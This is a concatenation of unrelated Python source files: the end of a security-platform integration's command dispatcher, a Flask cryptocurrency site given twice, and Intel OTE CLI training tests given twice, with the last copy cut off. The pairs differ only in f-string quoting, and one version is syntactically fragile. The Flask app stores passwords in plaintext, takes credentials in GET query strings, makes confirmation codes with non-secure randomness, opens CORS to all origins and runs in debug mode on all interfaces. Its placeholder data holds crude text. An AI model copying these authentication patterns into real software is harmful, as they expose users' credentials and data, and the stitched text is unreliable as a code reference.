return_results(results) elif demisto.command() == 'cov-secpr-list-sensors': r = list_sensors() if r: readable_output = tableToMarkdown('Sensors', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No sensors found' results = CommandResults( outputs_prefix='Covalence.Sensors', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-get-sensor': r = get_sensor() if r: readable_output = tableToMarkdown('Sensor', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'None sensor found' results = CommandResults( outputs_prefix='Covalence.Sensor', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-connections-summary-ip': r = connections_summary_by_ip() if r: readable_output = tableToMarkdown('Connections', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No connections found' results = CommandResults( outputs_prefix='Covalence.Connections', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-connections-summary-port': r = connections_summary_by_port() if r: readable_output = tableToMarkdown('Connections', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No connections found' results = CommandResults( outputs_prefix='Covalence.Connections', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-dns-resolutions': r = list_dns_resolutions() if r: readable_output = tableToMarkdown('DNS Resolutions', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No DNS resolutions found' results = CommandResults( outputs_prefix='Covalence.DNSResolutions', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-internal-networks': r = list_internal_networks() if r: readable_output = tableToMarkdown('Internal Networks', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No internal networks found' results = CommandResults( outputs_prefix='Covalence.InternalNetworks', outputs_key_field='cidr', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-set-internal-networks': r = set_internal_networks() cidr = r[0] notes = r[1] readable_output = f'Internal network set as {cidr} with notes "{notes}"' results = CommandResults( outputs_prefix='Covalence.InternalNetworks', outputs_key_field='cidr', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-endpoint-agents': r = list_endpoint_agents() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-find-endpoint-agents-by-user': r = find_endpoint_by_user() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-find-endpoint-agents-by-uuid': r = find_endpoint_by_uuid() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-search-endpoint-process': r = search_endpoint_process() if r: readable_output = tableToMarkdown('Endpoint Process', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint process found' results = CommandResults( outputs_prefix='Covalence.EndpointProcess', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-search-endpoint-installed-software': r = search_endpoint_installed_software() if r: readable_output = tableToMarkdown('Endpoint Software', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint software found' results = CommandResults( outputs_prefix='Covalence.EndpointSoftware', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-organizations': r = list_org() if r: readable_output = tableToMarkdown('Organizations', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No organizations found' results = CommandResults( outputs_prefix='Covalence.EndpointSoftware', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) else: msg = f'Unknown command {demisto.command()}' demisto.error(msg) except Exception as e: demisto.error(traceback.format_exc()) return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}\n{traceback.format_exc()}') if __name__ in ('__main__', '__builtin__', 'builtins'): main()
from flask import Flask, redirect, url_for, render_template, send_from_directory from pycoingecko import CoinGeckoAPI from modules import news, email from flask_cors import CORS from flask import request import datetime import requests import random import string import redis import json import os # video: json_file = open('config.json') config = json.load(json_file) cg = CoinGeckoAPI() ds = config['ds'] app = Flask(__name__, template_folder=config['template_folder']) app.secret_key = config['APP_SECRET_KEY'] CORS(app, resources={r"/*": {"origins": "*"}}) PORT = int(os.environ.get('PORT', 5000)) r = redis.from_url(config['redis-URI']) sender_mail = config['corporative-email'] password = config['corporative-email-password'] # Settings @app.route('/', methods=['GET']) def zero(): return redirect(url_for('home'), code=302) @app.route('/home', methods=['GET']) def home(): return render_template('index.html') @app.route('/about', methods=['GET']) def about(): return render_template('about.html') @app.route('/api', methods=['GET']) def api(): return render_template('api.html') @app.route('/static/<path:path>', methods=['GET']) def static_files(path): return send_from_directory('static', path) # APIs @app.route('/arsen_posts', methods=['GET']) def arsen_posts(): # r.set('news', str(news.get_crypto_news(config['cryptonews_api'], False))) # print(r.get('news').decode("utf-8")) # print(len(json.loads(r.get('news').decode("utf-8")))) dick = [ { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer facilisis nunc et felis rutrum feugiat. Phasellus lorem ex, tincidunt sit amet diam quis, laoreet rhoncus nulla. Vestibulum tristique id est sed pulvinar. Nam elementum eget tellus eget malesuada. Fusce consectetur, felis et euismod faucibus, turpis lacus imperdiet metus, ac ultricies diam urna id nisi. Proin pharetra viverra cursus. Proin ornare ex erat, a luctus orci consequat eu. Interdum et malesuada fames ac ante ipsum primis in faucibus. Etiam luctus aliquam lacus, sit amet aliquam neque mollis vel. Quisque eleifend pellentesque pulvinar. Nulla facilisi. Quisque ac lorem nec nisi ornare pulvinar in quis nulla. Quisque ut fringilla dolor.', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' }, { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'I Am Gay', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' }, { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'I Am Gay', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' } ] return json.dumps(dick) @app.route('/news', methods=['GET']) def new(): # r.set('news', str(news.get_crypto_news(config['cryptonews_api'], False))) print(r.get('news').decode("utf-8")) return r.get('news').decode("utf-8") @app.route('/current_cap/<coin>', methods=['GET']) def current_cap(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="1") return f'{dat['market_caps'][0][0]}=>{dat['market_caps'][0][1]}' @app.route('/caps_chart/<coin>', methods=['GET']) def caps_chart(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="7") x, y = [i[0] for i in dat['market_caps']], [i[1] for i in dat['market_caps']] ay = (sum(y) / len(y)) return '{"xValues":' + str(x) + ',"yValues":' + str(y) + ',"Min":' + str(min(y) - ay / 16) + ',"Max":' + str( max(y) + ay / 16) + '}' @app.route('/price_chart/<coin>', methods=['GET']) def price_chart(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="7") x, y = [i[0] for i in dat['market_caps']], [i[1] for i in dat['market_caps']] ay = (sum(y) / len(y)) return '{"xValues":' + str(x) + ',"yValues":' + str(y) + ',"Min":' + str(min(y) - ay / 16) + ',"Max":' + str( max(y) + ay / 16) + '}' @app.route('/table', methods=['GET']) def table(): print(r.get('table').decode("utf-8")) return r.get('table').decode("utf-8") if not cg.ping(): return 'Connection down' dat = cg.get_price(ids=ds, vs_currencies='usd,eur', include_market_cap='true', include_24hr_vol='true', include_24hr_change='true', include_last_updated_at='true') refuge = [] for i in dat: dat[i].update({"name": i}) if None in list(dat[i].values()): continue refuge.append(dat[i]) # r.set('table', json.dumps(refuge)) print(r.get('table').decode("utf-8")) return r.get('table').decode("utf-8") @app.route('/raw_data') def raw_data(): url = 'https://rest.coinapi.io/v1/exchanges' headers = {'X-CoinAPI-Key': config['X-CoinAPI-Key']} response = requests.get(url, headers=headers) return str(response.content) # User @app.route('/set_user_data', methods=['GET', 'POST', 'PUT']) def set_user_data(): if request.method == 'GET': if request.args.get('pass') == r.get(request.args.get('email')).decode("utf-8"): r.set(request.args.get('email') + "_data", request.args.get('dat')) return "Complete" return "Incorrect email or password" if request.method == 'POST' or request.method == 'PUT': if request.form.get('pass') == r.get(request.form.get('email')).decode("utf-8"): r.set(request.form.get('email') + "_data", request.form.get('dat')) return "Complete" return "Incorrect email or password" return 'Incorrect request' @app.route('/get_user_data', methods=['GET', 'POST']) def get_user_data(): if request.method == 'GET': if request.args.get('pass') == r.get(request.args.get('email')).decode("utf-8"): return r.get(request.args.get('email') + "_data").decode("utf-8") return 'Incorrect email or password' if request.method == 'POST': if request.form.get('pass') == r.get(request.form.get('email')).decode("utf-8"): return r.get(request.form.get('email') + "_data").decode("utf-8") return 'Incorrect email or password' return 'Incorrect request' @app.route('/registration', methods=['GET', 'POST']) def registration(): if request.method == 'GET': code = ''.join(random.choice(string.ascii_uppercase) for _ in range(6)) r.set(request.args.get('email'), code + " " + request.args.get('pass')) message = f''' Hello, {request.args.get('name')}! Your confirmation code is: {code} Please, do not tell it nobody and not reply to this email ... {config['company-name']} at: {datetime.datetime.now()} ''' email.send_email(config['corporative-email'], config['corporative-email-password'], request.args.get('email'), 'Confirmation code', message) if request.method == 'POST': code = ''.join(random.choice(string.ascii_uppercase) for _ in range(6)) r.set(request.form.get('email'), code + " " + request.form.get('pass')) message = f''' Hello, {request.form.get('name')}! Your confirmation code is: {code} Please, do not tell it nobody and not reply to this email ... {config['company-name']} at: {datetime.datetime.now()} ''' email.send_email(config['corporative-email'], config['corporative-email-password'], request.form.get('email'), 'Confirmation code', message) return "Complete" @app.route('/confirmation', methods=['GET', 'POST']) def confirmation(): if request.method == 'GET': if r.get(request.args.get('email')).decode("utf-8")[:6] == request.args.get('code'): r.set(request.args.get('email'), r.get(request.args.get('email')).decode("utf-8")[7:]) return "Successful" return "Unsuccessful" if request.method == 'POST': if r.get(request.form.get('email')).decode("utf-8")[:6] == request.form.get('code'): r.set(request.form.get('email'), r.get(request.form.get('email')).decode("utf-8")[7:]) return "Successful" return "Unsuccessful" return 'Incorrect request' @app.route('/subscribe', methods=['GET', 'POST', 'PATCH']) def subscribe(): if request.method == 'GET': dat = r.get('subscribers').decode("utf-8") + ',' + request.args.get('email') print(request.args.get('email')) r.set('subscribers', dat) return "Successful" if request.method == 'POST' or request.method == 'PATCH': dat = r.get('subscribers').decode("utf-8") + ',' + request.form.get('email') print(request.form.get('email')) r.set('subscribers', dat) return "Successful" return 'Incorrect request' if __name__ == '__main__': app.run(host='0.0.0.0', port=PORT, debug=True)
from flask import Flask, redirect, url_for, render_template, send_from_directory from pycoingecko import CoinGeckoAPI from modules import news, email from flask_cors import CORS from flask import request import datetime import requests import random import string import redis import json import os # video: json_file = open('config.json') config = json.load(json_file) cg = CoinGeckoAPI() ds = config['ds'] app = Flask(__name__, template_folder=config['template_folder']) app.secret_key = config['APP_SECRET_KEY'] CORS(app, resources={r"/*": {"origins": "*"}}) PORT = int(os.environ.get('PORT', 5000)) r = redis.from_url(config['redis-URI']) sender_mail = config['corporative-email'] password = config['corporative-email-password'] # Settings @app.route('/', methods=['GET']) def zero(): return redirect(url_for('home'), code=302) @app.route('/home', methods=['GET']) def home(): return render_template('index.html') @app.route('/about', methods=['GET']) def about(): return render_template('about.html') @app.route('/api', methods=['GET']) def api(): return render_template('api.html') @app.route('/static/<path:path>', methods=['GET']) def static_files(path): return send_from_directory('static', path) # APIs @app.route('/arsen_posts', methods=['GET']) def arsen_posts(): # r.set('news', str(news.get_crypto_news(config['cryptonews_api'], False))) # print(r.get('news').decode("utf-8")) # print(len(json.loads(r.get('news').decode("utf-8")))) dick = [ { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer facilisis nunc et felis rutrum feugiat. Phasellus lorem ex, tincidunt sit amet diam quis, laoreet rhoncus nulla. Vestibulum tristique id est sed pulvinar. Nam elementum eget tellus eget malesuada. Fusce consectetur, felis et euismod faucibus, turpis lacus imperdiet metus, ac ultricies diam urna id nisi. Proin pharetra viverra cursus. Proin ornare ex erat, a luctus orci consequat eu. Interdum et malesuada fames ac ante ipsum primis in faucibus. Etiam luctus aliquam lacus, sit amet aliquam neque mollis vel. Quisque eleifend pellentesque pulvinar. Nulla facilisi. Quisque ac lorem nec nisi ornare pulvinar in quis nulla. Quisque ut fringilla dolor.', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' }, { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'I Am Gay', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' }, { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'I Am Gay', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' } ] return json.dumps(dick) @app.route('/news', methods=['GET']) def new(): # r.set('news', str(news.get_crypto_news(config['cryptonews_api'], False))) print(r.get('news').decode("utf-8")) return r.get('news').decode("utf-8") @app.route('/current_cap/<coin>', methods=['GET']) def current_cap(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="1") return f'{dat["market_caps"][0][0]}=>{dat["market_caps"][0][1]}' @app.route('/caps_chart/<coin>', methods=['GET']) def caps_chart(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="7") x, y = [i[0] for i in dat['market_caps']], [i[1] for i in dat['market_caps']] ay = (sum(y) / len(y)) return '{"xValues":' + str(x) + ',"yValues":' + str(y) + ',"Min":' + str(min(y) - ay / 16) + ',"Max":' + str( max(y) + ay / 16) + '}' @app.route('/price_chart/<coin>', methods=['GET']) def price_chart(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="7") x, y = [i[0] for i in dat['market_caps']], [i[1] for i in dat['market_caps']] ay = (sum(y) / len(y)) return '{"xValues":' + str(x) + ',"yValues":' + str(y) + ',"Min":' + str(min(y) - ay / 16) + ',"Max":' + str( max(y) + ay / 16) + '}' @app.route('/table', methods=['GET']) def table(): print(r.get('table').decode("utf-8")) return r.get('table').decode("utf-8") if not cg.ping(): return 'Connection down' dat = cg.get_price(ids=ds, vs_currencies='usd,eur', include_market_cap='true', include_24hr_vol='true', include_24hr_change='true', include_last_updated_at='true') refuge = [] for i in dat: dat[i].update({"name": i}) if None in list(dat[i].values()): continue refuge.append(dat[i]) # r.set('table', json.dumps(refuge)) print(r.get('table').decode("utf-8")) return r.get('table').decode("utf-8") @app.route('/raw_data') def raw_data(): url = 'https://rest.coinapi.io/v1/exchanges' headers = {'X-CoinAPI-Key': config['X-CoinAPI-Key']} response = requests.get(url, headers=headers) return str(response.content) # User @app.route('/set_user_data', methods=['GET', 'POST', 'PUT']) def set_user_data(): if request.method == 'GET': if request.args.get('pass') == r.get(request.args.get('email')).decode("utf-8"): r.set(request.args.get('email') + "_data", request.args.get('dat')) return "Complete" return "Incorrect email or password" if request.method == 'POST' or request.method == 'PUT': if request.form.get('pass') == r.get(request.form.get('email')).decode("utf-8"): r.set(request.form.get('email') + "_data", request.form.get('dat')) return "Complete" return "Incorrect email or password" return 'Incorrect request' @app.route('/get_user_data', methods=['GET', 'POST']) def get_user_data(): if request.method == 'GET': if request.args.get('pass') == r.get(request.args.get('email')).decode("utf-8"): return r.get(request.args.get('email') + "_data").decode("utf-8") return 'Incorrect email or password' if request.method == 'POST': if request.form.get('pass') == r.get(request.form.get('email')).decode("utf-8"): return r.get(request.form.get('email') + "_data").decode("utf-8") return 'Incorrect email or password' return 'Incorrect request' @app.route('/registration', methods=['GET', 'POST']) def registration(): if request.method == 'GET': code = ''.join(random.choice(string.ascii_uppercase) for _ in range(6)) r.set(request.args.get('email'), code + " " + request.args.get('pass')) message = f''' Hello, {request.args.get('name')}! Your confirmation code is: {code} Please, do not tell it nobody and not reply to this email ... {config['company-name']} at: {datetime.datetime.now()} ''' email.send_email(config['corporative-email'], config['corporative-email-password'], request.args.get('email'), 'Confirmation code', message) if request.method == 'POST': code = ''.join(random.choice(string.ascii_uppercase) for _ in range(6)) r.set(request.form.get('email'), code + " " + request.form.get('pass')) message = f''' Hello, {request.form.get('name')}! Your confirmation code is: {code} Please, do not tell it nobody and not reply to this email ... {config['company-name']} at: {datetime.datetime.now()} ''' email.send_email(config['corporative-email'], config['corporative-email-password'], request.form.get('email'), 'Confirmation code', message) return "Complete" @app.route('/confirmation', methods=['GET', 'POST']) def confirmation(): if request.method == 'GET': if r.get(request.args.get('email')).decode("utf-8")[:6] == request.args.get('code'): r.set(request.args.get('email'), r.get(request.args.get('email')).decode("utf-8")[7:]) return "Successful" return "Unsuccessful" if request.method == 'POST': if r.get(request.form.get('email')).decode("utf-8")[:6] == request.form.get('code'): r.set(request.form.get('email'), r.get(request.form.get('email')).decode("utf-8")[7:]) return "Successful" return "Unsuccessful" return 'Incorrect request' @app.route('/subscribe', methods=['GET', 'POST', 'PATCH']) def subscribe(): if request.method == 'GET': dat = r.get('subscribers').decode("utf-8") + ',' + request.args.get('email') print(request.args.get('email')) r.set('subscribers', dat) return "Successful" if request.method == 'POST' or request.method == 'PATCH': dat = r.get('subscribers').decode("utf-8") + ',' + request.form.get('email') print(request.form.get('email')) r.set('subscribers', dat) return "Successful" return 'Incorrect request' if __name__ == '__main__': app.run(host='0.0.0.0', port=PORT, debug=True)
# Copyright (C) 2021 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions # and limitations under the License. import json import os from subprocess import run import pytest from ote_cli.registry import Registry from tests.ote_cli.common import collect_env_vars, get_some_vars, create_venv, patch_demo_py args = { '--train-ann-file': 'data/segmentation/custom/annotations/training', '--train-data-roots': 'data/segmentation/custom/images/training', '--val-ann-file': 'data/segmentation/custom/annotations/training', '--val-data-roots': 'data/segmentation/custom/images/training', '--test-ann-files': 'data/segmentation/custom/annotations/training', '--test-data-roots': 'data/segmentation/custom/images/training', } root = '/tmp/ote_cli/' ote_dir = os.getcwd() templates = Registry('external').filter(task_type='SEGMENTATION').templates templates_ids = [template.model_template_id for template in templates] @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_train(template): work_dir, template_work_dir, algo_backend_dir = get_some_vars(template, root) create_venv(algo_backend_dir, work_dir, template_work_dir) command_line = ['ote', 'train', template.model_template_id, '--train-ann-file', f'{os.path.join(ote_dir, args['--train-ann-file'])}', '--train-data-roots', f'{os.path.join(ote_dir, args['--train-data-roots'])}', '--val-ann-file', f'{os.path.join(ote_dir, args['--val-ann-file'])}', '--val-data-roots', f'{os.path.join(ote_dir, args['--val-data-roots'])}', '--save-model-to', f'{template_work_dir}/trained_{template.model_template_id}', 'params', '--learning_parameters.num_iters', '2', '--learning_parameters.batch_size', '2'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/weights.pth') assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/label_schema.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_export(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'export', template.model_template_id, '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', f'--save-model-to', f'{template_work_dir}/exported_{template.model_template_id}'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml') assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/openvino.bin') assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/label_schema.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_eval(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'eval', template.model_template_id, '--test-ann-file', f'{os.path.join(ote_dir, args['--test-ann-files'])}', '--test-data-roots', f'{os.path.join(ote_dir, args['--test-data-roots'])}', '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', '--save-performance', f'{template_work_dir}/trained_{template.model_template_id}/performance.json'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/performance.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_eval_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'eval', template.model_template_id, '--test-ann-file', f'{os.path.join(ote_dir, args['--test-ann-files'])}', '--test-data-roots', f'{os.path.join(ote_dir, args['--test-data-roots'])}', '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', '--save-performance', f'{template_work_dir}/exported_{template.model_template_id}/performance.json'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/performance.json') with open(f'{template_work_dir}/trained_{template.model_template_id}/performance.json') as read_file: trained_performance = json.load(read_file) with open(f'{template_work_dir}/exported_{template.model_template_id}/performance.json') as read_file: exported_performance = json.load(read_file) for k in trained_performance.keys(): assert abs(trained_performance[k] - exported_performance[k]) / trained_performance[k] <= 0.01, f"{trained_performance[k]=}, {exported_performance[k]=}" @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_demo(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'demo', template.model_template_id, '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', '--input', f'{os.path.join(ote_dir, args['--test-data-roots'])}', '--delay', '-1'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_demo_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'demo', template.model_template_id, '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', '--input', f'{os.path.join(ote_dir, args['--test-data-roots'])}', '--delay', '-1'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_deploy_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) deployment_dir = f'{template_work_dir}/deployed_{template.model_template_id}' command_line = ['ote', 'deploy', template.model_template_id, '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', f'--save-model-to', deployment_dir] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert run(['unzip', 'openvino.zip'], cwd=deployment_dir).returncode == 0 assert run(['python3', '-m', 'venv', 'venv'], cwd=os.path.join(deployment_dir, 'python')).returncode == 0 assert run(['python3', '-m', 'pip', 'install', 'wheel'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0 assert run(['python3', '-m', 'pip', 'install', 'demo_package-0.0-py3-none-any.whl'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0 patch_demo_py(os.path.join(deployment_dir, 'python', 'demo.py'), os.path.join(deployment_dir, 'python', 'demo_patched.py')) assert run(['python3', 'demo_patched.py', '-m', '../model/model.xml', '-i', f'{os.path.join(ote_dir, args['--test-data-roots'])}'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0
# Copyright (C) 2021 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions # and limitations under the License. import json import os from subprocess import run import pytest from ote_cli.registry import Registry from tests.ote_cli.common import collect_env_vars, get_some_vars, create_venv, patch_demo_py args = { '--train-ann-file': 'data/segmentation/custom/annotations/training', '--train-data-roots': 'data/segmentation/custom/images/training', '--val-ann-file': 'data/segmentation/custom/annotations/training', '--val-data-roots': 'data/segmentation/custom/images/training', '--test-ann-files': 'data/segmentation/custom/annotations/training', '--test-data-roots': 'data/segmentation/custom/images/training', } root = '/tmp/ote_cli/' ote_dir = os.getcwd() templates = Registry('external').filter(task_type='SEGMENTATION').templates templates_ids = [template.model_template_id for template in templates] @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_train(template): work_dir, template_work_dir, algo_backend_dir = get_some_vars(template, root) create_venv(algo_backend_dir, work_dir, template_work_dir) command_line = ['ote', 'train', template.model_template_id, '--train-ann-file', f'{os.path.join(ote_dir, args["--train-ann-file"])}', '--train-data-roots', f'{os.path.join(ote_dir, args["--train-data-roots"])}', '--val-ann-file', f'{os.path.join(ote_dir, args["--val-ann-file"])}', '--val-data-roots', f'{os.path.join(ote_dir, args["--val-data-roots"])}', '--save-model-to', f'{template_work_dir}/trained_{template.model_template_id}', 'params', '--learning_parameters.num_iters', '2', '--learning_parameters.batch_size', '2'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/weights.pth') assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/label_schema.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_export(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'export', template.model_template_id, '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', f'--save-model-to', f'{template_work_dir}/exported_{template.model_template_id}'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml') assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/openvino.bin') assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/label_schema.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_eval(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'eval', template.model_template_id, '--test-ann-file', f'{os.path.join(ote_dir, args["--test-ann-files"])}', '--test-data-roots', f'{os.path.join(ote_dir, args["--test-data-roots"])}', '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', '--save-performance', f'{template_work_dir}/trained_{template.model_template_id}/performance.json'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/performance.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_eval_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'eval', template.model_template_id, '--test-ann-file', f'{os.path.join(ote_dir, args["--test-ann-files"])}', '--test-data-roots', f'{os.path.join(ote_dir, args["--test-data-roots"])}', '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', '--save-performance', f'{template_work_dir}/exported_{template.model_template_id}/performance.json'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/performance.json') with open(f'{template_work_dir}/trained_{template.model_template_id}/performance.json') as read_file: trained_performance = json.load(read_file) with open(f'{template_work_dir}/exported_{template.model_template_id}/performance.json') as read_file: exported_performance = json.load(read_file) for k in trained_performance.keys(): assert abs(trained_performance[k] - exported_performance[k]) / trained_performance[k] <= 0.01, f"{trained_performance[k]=}, {exported_performance[k]=}" @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_demo(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'demo', template.model_template_id, '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', '--input', f'{os.path.join(ote_dir, args["--test-data-roots"])}', '--delay', '-1'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_demo_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'demo', template.model_template_id, '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', '--input', f'{os.path.join(ote_dir, args["--test-data-roots"])}', '--delay', '-1'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 @pytest.mark.parametrize("template", templates, ids=templates_ids) def 